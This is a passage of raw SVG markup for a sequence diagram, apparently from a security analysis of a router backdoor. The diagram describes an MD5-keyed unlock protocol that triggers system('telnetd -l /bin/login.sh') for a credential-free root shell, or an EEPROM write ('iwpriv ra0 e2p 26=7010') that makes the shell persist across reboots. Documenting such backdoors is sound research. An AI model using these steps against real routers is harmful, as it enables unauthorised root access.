translate(-589.8324176608086,-1287.264282204)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 602.3979586608086 1280.981511704 L 589.8324176608086 1287.264282204 L 602.3979586608086 1293.547052704 Z"/></g></g><g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1309.882256004" width="491.306927584707" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1324.960905204" width="436.6069253912561" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1340.039554404" width="96.22359170824218" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="710.2872817349297" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="747.2872817349297" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hashes of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="827.3539473843438" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="942.9539458584649" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="979.8872802090508" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the 16-byte results as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="849.3206145596367" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="924.2539489102227" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="961.1872832608086" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1037.3539473843439" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1353.610338684" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 589.8324176608086 1359.6417983640001 L 650.1470144608086 1359.6417983640001 L 650.1470144608086 1379.244042324 L 602.2471721688086 1379.244042324" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(589.8324176608086,1379.244042324) translate(-589.8324176608086,-1379.244042324)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 602.3979586608086 1372.961271824 L 589.8324176608086 1379.244042324 L 602.3979586608086 1385.526812824 Z"/></g></g><g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1401.862016124" width="364.50693216234373" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1416.940665324" width="233.90692891985108" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1432.019314524" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1447.097963724" width="358.4235962858789" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1462.176612924" width="271.9569329252832" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1477.255262124" width="359.02360429674314" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1492.333911324" width="388.7736023893945" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1507.412560524" width="387.0569313994043" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1522.4912097239999" width="101.60693063646484" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1537.5698589239998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1552.6485081239998" width="214.17359104067017" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1415.432800404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">The Client is now expected to append one of two</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">suffixes to </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="183.06781628317185" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">xor(XOR_MASK,SECRET_PLAINTEXT)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="327.3844819325859" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1445.590098804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">- "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="119.66781475729296" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="171.7178139943535" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to launch a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="274.55114987081834" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="334.46781780905076" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> session that will</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1475.747397204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   last until the router is rebooted, </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="italic" font-weight="normal" text-decoration="normal" x="355.36781933492966" y="1475.747397204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">or</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">-  "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="124.33448078817675" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="177.61781361288377" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to write a flag to a physical volume,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   which the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="193.11781170553513" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="321.21781780905076" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon will check for</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1520.983344804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   when the system is rebooted, and launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="425.56781628317185" y="1520.983344804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1536.0619940039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   if it finds it.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1551.1406432039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="239.4178071278984" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="307.9344773549492" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 75.30695738200001 1572.2507520840002 L 143.160878782 1572.2507520840002 L 143.160878782 1591.852996044 L 95.26103649 1591.852996044" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(82.846281982,1591.852996044) translate(-82.846281982,-1591.852996044)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 95.41182298199999 1585.570225544 L 82.846281982 1591.852996044 L 95.41182298199999 1598.135766544 Z"/></g></g><g><g><rect fill="white" stroke="none" x="108.228674802" y="1614.4709698440001" width="352.50692834764646" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="108.228674802" y="1629.549619044" width="221.69026126772096" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="110.490472182" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="210.8404706561211" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="247.8404706561211" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hash of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="311.2238057696465" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="379.7404759966973" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="110.490472182" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="203.49047218200002" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.990472182" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 82.846281982 1649.1518630040002 L 150.700203382 1649.1518630040002 L 150.700203382 1668.7541069640001 L 102.80036109000001 1668.7541069640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(90.38560658200001,1668.7541069640001) translate(-90.38560658200001,-1668.7541069640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 102.951147582 1662.4713364640002 L 90.38560658200001 1668.7541069640001 L 102.951147582 1675.036877464 Z"/></g></g><g><g><rect fill="white" stroke="none" x="217.41088641052053" y="1691.3720807640002" width="237.8569268217676" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="219.67268379052052" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="261.3060189040459" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="380.8060189040459" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 90.38560658200001 1710.974324724 L 569.8783385528086 1710.974324724" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(582.2930930608086,1710.974324724) translate(-582.2930930608086,-1710.974324724)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 569.7275520608085 1704.6915542240001 L 582.2930930608086 1710.974324724 L 569.7275520608085 1717.257095224 Z"/></g></g><g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1733.5922985240002" width="325.9402593603723" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1748.6709477240001" width="310.85692920595335" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1763.7495969240001" width="300.40692224413084" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1778.828246124" width="289.2069214811914" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1793.906895324" width="134.62360086351563" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1808.985544524" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1824.064193724" width="327.1735891333215" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1839.142842924" width="324.89025440126585" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1854.221492124" width="320.2235902777307" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1869.300141324" width="340.8402642241113" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1884.378790524" width="355.54026498705076" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1899.4574397239999" width="326.74026193529295" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="617.4766078608086" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="629.3266082422783" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="633.9932747499993" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="753.4932747499993" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="825.9099388735344" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="900.8432732241204" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="647.3599410669854" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="720.9932723658135" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="904.7932754175713" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="919.143275799041" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">launching an unencrypted </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="814.626601757293" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="874.5432696955254" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> shell</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="638.7766070978691" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">root</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="673.1932750361016" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. No credentials are required to</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1807.477679604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">log into this shell.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1822.556328804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="617.4766078608086" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="629.3266082422783" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="633.9932747499993" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="753.4932747499993" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="825.9099388735344" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="902.0766029970696" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="647.3599410669854" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="720.9932723658135" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">iwpriv ra0 e2p 26=7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="918.8266006128838" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="933.1766009943535" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">writing the bytes [HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="792.2432704584648" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="829.5766025202324" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">] to </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="859.3599353449395" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">EEPROM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="928.5099368708184" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">at offset </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="683.0766063349297" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x26</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="719.7599406855156" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> (virtual address </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="844.0599437372734" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x40026</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="908.7432780878594" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">). This</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">code will instruct the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="775.8099361078789" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="903.9099422113945" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="690.5766063349297" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="874.3766093866875" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> on boot.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 597.3717422608086 1919.0596836840002 L 657.6863390608086 1919.0596836840002 L 657.6863390608086 1938.6619276440001 L 609.7864967688085 1938.6619276440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(597.3717422608086,1938.6619276440001) translate(-597.3717422608086,-1938.6619276440001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 609.9372832608086 1932.3791571440001 L 597.3717422608086 1938.6619276440001 L 609.9372832608086 1944.944698144 Z"/></g></g></g><g/><g/></g></svg>